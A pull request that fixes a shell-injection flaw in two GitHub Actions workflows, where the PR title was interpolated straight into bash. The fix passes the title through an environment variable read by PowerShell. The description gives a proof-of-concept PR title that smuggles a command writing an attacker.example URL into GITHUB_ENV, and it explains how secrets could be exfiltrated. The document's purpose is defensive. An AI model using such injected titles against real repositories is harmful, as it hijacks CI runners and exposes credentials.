### PR TITLE
fix(ci): prevent shell injection via PR title in custom-version workflows

### DIFF
--- a/.github/workflows/lint-custom-version.yml
+++ b/.github/workflows/lint-custom-version.yml
@@ -20,21 +20,18 @@ jobs:
 
       - name: Extract version from PR
         id: extract-version
-        shell: bash
+        shell: pwsh
+        env:
+          PR_TITLE: ${{ github.event.pull_request.title }}
         run: |
-          # Extract version from PR title only
-          PR_TITLE="${{ github.event.pull_request.title }}"
-
-          # Search for version pattern in title (any x.y.z.dev version)
-          VERSION=$(echo "$PR_TITLE" | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.dev[0-9]+' | head -1)
-
-          if [ -z "$VERSION" ]; then
-            echo "No version found in PR title. Please include version in title like: 2.0.65.dev1004030443"
+          $match = [regex]::Match($env:PR_TITLE, '[0-9]+\.[0-9]+\.[0-9]+\.dev[0-9]+')
+          if (-not $match.Success) {
+            Write-Output "No version found in PR title. Please include version in title like: 2.0.65.dev1004030443"
             exit 1
-          fi
-
-          echo "Extracted version: $VERSION"
-          echo "version=$VERSION" >> $GITHUB_OUTPUT
+          }
+          $version = $match.Value
+          Write-Output "Extracted version: $version"
+          "version=$version" | Add-Content -Path $env:GITHUB_OUTPUT
 
       - name: Setup uv
         uses: astral-sh/setup-uv@v5
@@ -47,31 +44,26 @@ jobs:
           python-version-file: ".python-version"
 
       - name: Modify pyproject.toml for custom UiPath version
-        shell: bash
+        shell: pwsh
+        env:
+          UIPATH_VERSION: ${{ steps.extract-version.outputs.version }}
         run: |
-          # Backup original pyproject.toml
-          cp pyproject.toml pyproject.toml.backup
+          Copy-Item pyproject.toml pyproject.toml.backup
 
-          # Update the uipath dependency to the custom version
-          sed -i 's|"uipath>=.*"|"uipath==${{ steps.extract-version.outputs.version }}"|' pyproject.toml
+          $content = Get-Content pyproject.toml -Raw
+          $content = $content -replace '"uipath>=[^"]*"', "`"uipath==$env:UIPATH_VERSION`""
 
+          if ($content -notmatch '\[tool\.uv\.sources\]') {
+            $content = $content.TrimEnd() + "`n`n[tool.uv.sources]`nuipath = { index = `"testpypi`" }`n"
+          } elseif ($content -notmatch 'uipath\s*=\s*\{\s*index\s*=\s*"testpypi"\s*\}') {
+            $content = $content -replace '(\[tool\.uv\.sources\])', "`$1`nuipath = { index = `"testpypi`" }"
+          }
 
+          Set-Content -Path pyproject.toml -Value $content -NoNewline
 
-          # Add or update [tool.uv.sources] section if it doesn't exist
-          if ! grep -q "\[tool\.uv\.sources\]" pyproject.toml; then
-            echo "" >> pyproject.toml
-            echo "[tool.uv.sources]" >> pyproject.toml
-            echo 'uipath = { index = "testpypi" }' >> pyproject.toml
-          else
-            # Update existing sources if needed
-            if ! grep -q 'uipath = { index = "testpypi" }' pyproject.toml; then
-              sed -i '/\[tool\.uv\.sources\]/a uipath = { index = "testpypi" }' pyproject.toml
-            fi
-          fi
-
-          echo "Modified pyproject.toml to use UiPath version ${{ steps.extract-version.outputs.version }} from testpypi"
-          echo "=== Modified pyproject.toml content ==="
-          grep -A5 -B5 "uipath\|testpypi" pyproject.toml || true
+          Write-Output "Modified pyproject.toml to use UiPath version $env:UIPATH_VERSION from testpypi"
+          Write-Output "=== Modified pyproject.toml content ==="
+          Get-Content pyproject.toml
 
       - name: Install dependencies
         run: uv sync --all-extras
@@ -87,6 +79,5 @@ jobs:
 
       - name: Restore original pyproject.toml
         if: always()
-        shell: bash
-        run: |
-          mv pyproject.toml.backup pyproject.toml
+        shell: pwsh
+        run: Move-Item -Force pyproject.toml.backup pyproject.toml

--- a/.github/workflows/test-custom-version.yml
+++ b/.github/workflows/test-custom-version.yml
@@ -32,21 +32,18 @@ jobs:
 
       - name: Extract version from PR
         id: extract-version
-        shell: bash
+        shell: pwsh
+        env:
+          PR_TITLE: ${{ github.event.pull_request.title }}
         run: |
-          # Extract version from PR title only
-          PR_TITLE="${{ github.event.pull_request.title }}"
-
-          # Search for version pattern in title (any x.y.z.dev version)
-          VERSION=$(echo "$PR_TITLE" | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.dev[0-9]+' | head -1)
-
-          if [ -z "$VERSION" ]; then
-            echo "No version found in PR title. Please include version in title like: 2.0.65.dev1004030443"
+          $match = [regex]::Match($env:PR_TITLE, '[0-9]+\.[0-9]+\.[0-9]+\.dev[0-9]+')
+          if (-not $match.Success) {
+            Write-Output "No version found in PR title. Please include version in title like: 2.0.65.dev1004030443"
             exit 1
-          fi
-
-          echo "Extracted version: $VERSION"
-          echo "version=$VERSION" >> $GITHUB_OUTPUT
+          }
+          $version = $match.Value
+          Write-Output "Extracted version: $version"
+          "version=$version" | Add-Content -Path $env:GITHUB_OUTPUT
 
       - name: Setup uv
         uses: astral-sh/setup-uv@v5
@@ -59,31 +56,26 @@ jobs:
           python-version: ${{ matrix.python-version }}
 
       - name: Modify pyproject.toml for custom UiPath version
-        shell: bash
+        shell: pwsh
+        env:
+          UIPATH_VERSION: ${{ steps.extract-version.outputs.version }}
         run: |
-          # Backup original pyproject.toml
-          cp pyproject.toml pyproject.toml.backup
+          Copy-Item pyproject.toml pyproject.toml.backup
 
-          # Update the uipath dependency to the custom version
-          sed -i 's|"uipath>=.*"|"uipath==${{ steps.extract-version.outputs.version }}"|' pyproject.toml
+          $content = Get-Content pyproject.toml -Raw
+          $content = $content -replace '"uipath>=[^"]*"', "`"uipath==$env:UIPATH_VERSION`""
 
+          if ($content -notmatch '\[tool\.uv\.sources\]') {
+            $content = $content.TrimEnd() + "`n`n[tool.uv.sources]`nuipath = { index = `"testpypi`" }`n"
+          } elseif ($content -notmatch 'uipath\s*=\s*\{\s*index\s*=\s*"testpypi"\s*\}') {
+            $content = $content -replace '(\[tool\.uv\.sources\])', "`$1`nuipath = { index = `"testpypi`" }"
+          }
 
+          Set-Content -Path pyproject.toml -Value $content -NoNewline
 
-          # Add or update [tool.uv.sources] section if it doesn't exist
-          if ! grep -q "\[tool\.uv\.sources\]" pyproject.toml; then
-            echo "" >> pyproject.toml
-            echo "[tool.uv.sources]" >> pyproject.toml
-            echo 'uipath = { index = "testpypi" }' >> pyproject.toml
-          else
-            # Update existing sources if needed
-            if ! grep -q 'uipath = { index = "testpypi" }' pyproject.toml; then
-              sed -i '/\[tool\.uv\.sources\]/a uipath = { index = "testpypi" }' pyproject.toml
-            fi
-          fi
-
-          echo "Modified pyproject.toml to use UiPath version ${{ steps.extract-version.outputs.version }} from testpypi"
-          echo "=== Modified pyproject.toml content ==="
-          grep -A5 -B5 "uipath\|testpypi" pyproject.toml || true
+          Write-Output "Modified pyproject.toml to use UiPath version $env:UIPATH_VERSION from testpypi"
+          Write-Output "=== Modified pyproject.toml content ==="
+          Get-Content pyproject.toml
 
       - name: Install dependencies with specific UiPath version
         run: uv sync --all-extras
@@ -97,6 +89,5 @@ jobs:
 
       - name: Restore original pyproject.toml
         if: always()
-        shell: bash
-        run: |
-          mv pyproject.toml.backup pyproject.toml
+        shell: pwsh
+        run: Move-Item -Force pyproject.toml.backup pyproject.toml


### PR DESCRIPTION
## Summary

- `lint-custom-version.yml` and `test-custom-version.yml` interpolated `github.event.pull_request.title` directly into the bash `run:` block via `${{ ... }}`. Because that interpolation happens before the shell parses the script, a PR title containing `"` plus `&&`/`$(...)` could break out of the string literal and execute arbitrary commands on the runner — including writing to `$GITHUB_ENV` to poison later steps.
- Same vulnerability class as the original PRODEV-239 report on `publish-dev.yml`, flagged in the issue comments.
- Risk for `test-custom-version.yml` is higher: a later step runs `uv run pytest` with `UIPATH_URL` / `UIPATH_CLIENT_ID` / `UIPATH_CLIENT_SECRET` in env, so a hijacked early step could drop a malicious conftest/build hook to exfiltrate them.

## Fix

- Pass the PR title via the step's `env:` block instead of `${{ }}` interpolation — the shell parser only ever sees the env-var reference, never the attacker-controlled value as code.
- Convert the affected `bash` steps to PowerShell Core (`pwsh`) for consistency with the already-secured `publish-dev.yml` in this repo.
- Regex constraint on the extracted version (`[0-9]+\.[0-9]+\.[0-9]+\.dev[0-9]+`) is preserved, so the `Modify pyproject.toml` step's input is still safe even before reaching `Set-Content`.

## POC the fix blocks

PR title:
```
test" && echo "UV_PUBLISH_URL=https://attacker.example" >> $GITHUB_ENV && echo "
```
Before: writes attacker-controlled env vars for later steps.
After: the title is read as data from `$env:PR_TITLE`, never executed.

## Test plan

- [ ] Open a test PR with the `test-core-dev-version` label and a valid title (e.g. `bump uipath to 2.0.65.dev1004030443`) — Extract version step should succeed.
- [ ] Open a test PR with a title missing the version pattern — Extract step should fail cleanly with the existing error message.
- [ ] Verify `Modify pyproject.toml` correctly inserts/preserves `[tool.uv.sources]` and `uipath = { index = "testpypi" }`.

Tracking: PRODEV-239